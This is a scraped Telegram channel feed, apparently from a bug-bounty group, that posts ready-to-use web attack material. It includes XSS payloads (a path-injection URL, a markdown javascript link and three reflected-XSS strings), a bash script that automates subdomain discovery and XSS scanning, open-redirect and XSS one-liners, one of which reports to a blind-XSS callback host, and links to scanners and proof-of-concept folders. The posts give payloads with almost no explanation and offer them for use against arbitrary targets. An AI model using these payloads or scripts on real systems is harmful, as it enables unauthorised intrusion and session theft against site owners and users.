Use when current URL is used by target’s underlying PHP code as an attribute value of an HTML form, for example. Inject between php extension and start of query part (?) using a leading slash (/).
https://brutelogic.com.br/xss.php/"><noscript onload=alert(1)>?a=reader
Markdown Vector
Use in text boxes, comment sections, etc that allows some markup input. Click to fire.
[clickme](javanoscript:alert`1`)
🔥8❤4
This media is not supported in your browser
VIEW IN TELEGRAM
🌟Dnsbruter- Dns Bruteforcing Tool🌟
👉It is a powerful tool designed to perform active subdomain enumeration and discovery.
🔗Link https://github.com/sanjai-AK47/Dnsbruter/
👉It is a powerful tool designed to perform active subdomain enumeration and discovery.
🔗Link https://github.com/sanjai-AK47/Dnsbruter/
🔥7👍3
🌟Bug Bounty PoC's🌟
✅https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
✅https://drive.google.com/drive/folders/14zlqgin6rUfr6jQRBCLbbP8P8Vdypz7x
❤16👍5🔥3
Top 3 RXSS payloads
`'";//><img/src=x onError="${x};alert(`1`);">
`'";//><Img Src=a OnError=location=src>
`'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))>
❤6🔥3❤🔥1👍1
Simple Reflected XSS
1. subfinder -d target .com | httprobe -c 100 > target.txt
2. cat target.txt | waybackurls | gf xss | kxxs
🥰7🔥3
Brut Security
Simple Reflected XSS 1. subfinder -d target .com | httprobe -c 100 > target.txt 2. cat target.txt | waybackurls | gf xss | kxxs
For Automation Reflected XSS Scanning
#!/bin/bash
# Prompt user for domain input
read -p "Enter the domain you want to scan: " domain
# Define output file
output_file="scan_output.txt"
# Run subfinder to find subdomains, filter through httprobe, and save to target.txt
echo "Finding subdomains for $domain..."
subfinder -d $domain | httprobe -c 100 > target.txt
# Use waybackurls to find URLs from Wayback Machine, filter through gf for XSS, and scan with kxxs
echo "Scanning for XSS vulnerabilities..."
cat target.txt | waybackurls | gf xss | kxxs >> "$output_file"
# Display output file location
echo "Scan output saved to $output_file"
🔥6❤2
🚨Toxicache🚨
👉Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗https://lnkd.in/gdtpJGmT
👉Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
🔗https://lnkd.in/gdtpJGmT
⚡5❤3🔥2👍1🌭1
Awesome Bug Bounty One-liners
A collection of awesome one-liner noscripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
📚 Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
A collection of awesome one-liner noscripts especially for bug bounty.
Open-redirect
Bash
export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
Bash
cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0. .1:8080 -sk > /dev/null
XSS
waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
Bash
cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
📚 Repositories:
1. https://lnkd.in/dMBdxSQD
2. https://lnkd.in/ebTrAP8y
3. https://lnkd.in/dmG4G3ea
4. https://lnkd.in/dXxHMUu9
👍10🔥5